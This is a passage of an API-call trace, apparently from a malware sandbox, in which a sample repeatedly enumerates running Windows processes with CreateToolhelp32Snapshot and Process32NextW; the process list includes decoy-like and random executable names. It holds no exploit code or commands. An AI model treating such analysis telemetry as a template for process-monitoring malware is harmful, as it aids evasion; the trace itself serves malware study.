lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.984] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0137.985] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0137.987] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0137.988] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0137.989] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0137.990] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0137.991] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0137.992] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0137.993] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0137.995] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0137.996] Process32NextW (in: hSnapshot=0xbc, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0137.997] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0137.998] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0137.999] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0138.000] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0138.002] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0138.003] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0138.004] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0138.006] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0138.007] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0138.019] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0138.020] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.022] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0138.023] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) 
returned 1 [0138.025] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0138.026] CloseHandle (hObject=0xbc) returned 1 [0138.026] Sleep (dwMilliseconds=0x12c) [0138.383] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0138.390] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0138.391] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0138.392] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0138.393] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0138.394] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0138.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0138.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0138.396] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0138.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0138.398] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0138.399] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.400] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.401] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.402] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.403] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.404] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0138.405] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.406] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.406] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0138.408] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.410] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0138.411] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0138.426] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0138.427] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0138.441] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.443] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0138.445] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0138.446] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0138.447] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0138.449] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0138.450] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0138.452] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0138.453] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0138.455] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 
| out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0138.456] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0138.458] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0138.459] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0138.461] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0138.462] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0138.464] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0138.465] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0138.467] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0138.468] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0138.470] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0138.471] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0138.472] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0138.474] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.478] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0138.480] CloseHandle (hObject=0xc4) returned 1 [0138.480] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0138.486] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0138.487] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0138.488] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0138.489] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0138.490] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0138.491] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
